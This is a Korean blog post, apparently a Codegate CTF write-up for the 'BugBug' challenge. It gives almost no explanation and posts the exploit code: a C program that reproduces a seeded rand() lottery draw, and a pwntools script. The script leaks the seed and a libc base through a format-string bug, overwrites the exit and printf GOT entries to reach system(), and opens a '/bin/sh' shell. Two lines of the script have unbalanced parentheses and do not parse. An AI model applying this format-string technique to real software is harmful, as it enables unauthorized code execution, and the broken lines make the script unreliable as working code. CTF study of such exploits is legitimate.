
[Codegate] BugBug

MyriaBreak 2018. 8. 22. 18:11

아 풀다가 화나서ㅁㄴㅇㄹ... 대체 고놈의 오류때문에;;; 결국 원인은 알아내지 못하고 갈아엎고 다시 코드를 짜게 되었다 ㅡㅡ;;;


귀찮아서 설명은 안 적겠다 하ㅏㅏㅏㅏ 진짜;;;

그냥 익스코드만 올려놔야지



#include <stdio.h>
#include <stdlib.h>
 
int main(int argc, char* argv[])
{
    /*
     * Print six values in 1..45 drawn from the C library rand() stream for
     * the seed given as argv[1].  The draw depends only on the seed, so it
     * can be reproduced by anyone who learns the seed; the commented-out
     * /dev/urandom lines suggest this is the seed source being replaced.
     *
     * Usage: <prog> <seed>
     * Returns 0 in every case, including when no seed is supplied.
     */
    unsigned int seed;
    //FILE* urand = fopen("/dev/urandom", "rb");
    int i,j;
    int random[6]={0,0,0,0,0,0};   /* the six drawn values, filled in order */
    int next_random;
 
    if(argc <2 )
        return 0;                  /* no seed given: print nothing */
    /* atoi() yields an int; storing it in an unsigned converts modulo 2^32,
     * so a negative argument still produces a valid seed value. */
    seed = atoi(argv[1]);
        //fread(&seed, 4, 1, urand);
       srand(seed);
 
    for(i=0; i<6; i++)
    {
        next_random = rand()%45+1;
        /* Re-draw on a duplicate.  Note that j is set to 0 and then bumped
         * to 1 by the loop increment, so after a collision random[0] is not
         * compared again (only indices 1..i-1 are).
         * NOTE(review): this looks like a faithful copy of the target's
         * generator; do not "fix" it without confirming the target behaves
         * the same way, or the reproduced sequence will diverge. */
        for(j=0; j<i; j++)
        {
            if(random[j]==next_random){
                next_random = rand()%45+1;
                j=0;
            }
        }
        random[i]=next_random;
    }
    /* Output format: space-separated numbers (trailing space), then newline. */
    for(i=0; i<6; i++)
        printf("%d ",random[i]);
    printf("\n");
    return 0;
}
 






from pwn import *
from subprocess import Popen, PIPE
 
conn = process("./BugBug")   # spawn the challenge binary locally; all later send/recv calls go through this tube
 
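def get_lottonum(seed):
    """Run the local ``./rand`` helper with *seed* and return its raw stdout.

    ``./rand`` is presumably the C program from this write-up compiled
    locally; it prints the seeded rand() draw.  The output is returned
    unmodified (no decoding, no stripping) because the caller sends it
    back to the service verbatim.

    Args:
        seed: integer seed passed to the helper as its single argument.

    Returns:
        The helper's stdout as raw bytes/str (whatever ``Popen`` yields on
        this Python version), including any trailing newline.
    """
    # argv list with shell=False: the seed is handed over as one argument
    # instead of being interpolated into a shell command string.
    popen = Popen(["./rand", str(seed)], stdout=PIPE)
    output, _ = popen.communicate()   # stderr is not captured (None)
    return output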
 
# Fixed 0x0804xxxx addresses of the local ./BugBug build; the binary appears
# to be 32-bit and non-PIE.  These values are specific to this challenge.
# The script appears to target Python 2 / older pwntools: payloads are built
# as str and p32() results are concatenated directly.
exit_got = 0x804A024      # GOT entry of exit()
printf_got = 0x804A010    # GOT entry of printf()
main_addr = 0x804882E     # address of main()
 
# exit_got -> main_addr
# First format-string write: "%<N>x" pads the output to N = main_addr & 0xFFFF
# characters and "%21$hn" then stores that count as a 16-bit value through
# the 21st stack argument, presumably the exit_got pointer placed at payload
# offset 16.  "BASE%4$x" prints the 4th stack argument as hex; it is parsed
# below as the libc leak.  The line is padded to a fixed 100 bytes.
payload = "%"+str(main_addr&0xFFFF)+"x"
payload += "%21$hn"
payload += "A"*(16-len(payload))
payload += p32(exit_got)
payload += "BASE%4$x"
payload += "B"*(100-len(payload))
 
conn.recvuntil("Who are you?")    
conn.sendline(payload)
conn.recvuntil("Hello~ ")
conn.recv(100)              # skip 100 bytes, presumably the echoed name
## leak Lotto SEED
seed = u32(conn.recv(4))    # the following 4 bytes are read as the lotto seed (little-endian)
lotto_num = get_lottonum(seed)   # reproduce the draw locally from the leaked seed
 
## leak and FSB
log.info(lotto_num)
conn.recvuntil("==> ")
conn.sendline(lotto_num)    # answer the lotto prompt with the reproduced numbers
 
## leak BASE_addr
conn.recvuntil("BASE")
# NOTE(review): the next line does not parse as written -- the int(...) call
# is never closed.  The intent appears to be "leaked value minus 0x1fda74",
# an offset specific to the challenge environment's libc.
base_addr = int(conn.recvuntil("BB")[:-2], 16- 0x1fda74
log.info("base_addr : 0x%x" % base_addr)
 
system_addr = base_addr + 0x3ada0    # libc offset of system(); specific to the challenge's libc build
system_first = (system_addr&0xFFFF)  # low half-word, written first
# NOTE(review): this line also has an unbalanced parenthesis and does not
# parse.  The "distance" log message suggests it is meant to hold the extra
# padding needed for the second half-word after the first has been written.
system_next = (system_addr>>16- (system_addr&0xFFFF)
 
log.info("distance : %d" % (system_next))
 
# Second format-string write: two %hn stores through stack arguments 26 and
# 27, presumably printf_got and printf_got+2 placed at payload offset 32,
# i.e. the low and then the high half-word of system_addr.
payload = "%"+str(system_first)+"x"
payload += "%26$hn"
payload += "%"+str(system_next)+"x"
payload += "%27$hn"
payload += "A"*(32-len(payload))
payload += p32(printf_got)
payload += p32(printf_got+2)
payload += "B"*(100-len(payload))
 
conn.sendline(payload)
conn.sendline(lotto_num)
conn.sendline("/bin/sh;")   # with printf's GOT slot rewritten, the program's next printf of this input presumably reaches system()
conn.recvuntil("Input your answer@_@")
conn.sendline(lotto_num)
 
conn.interactive()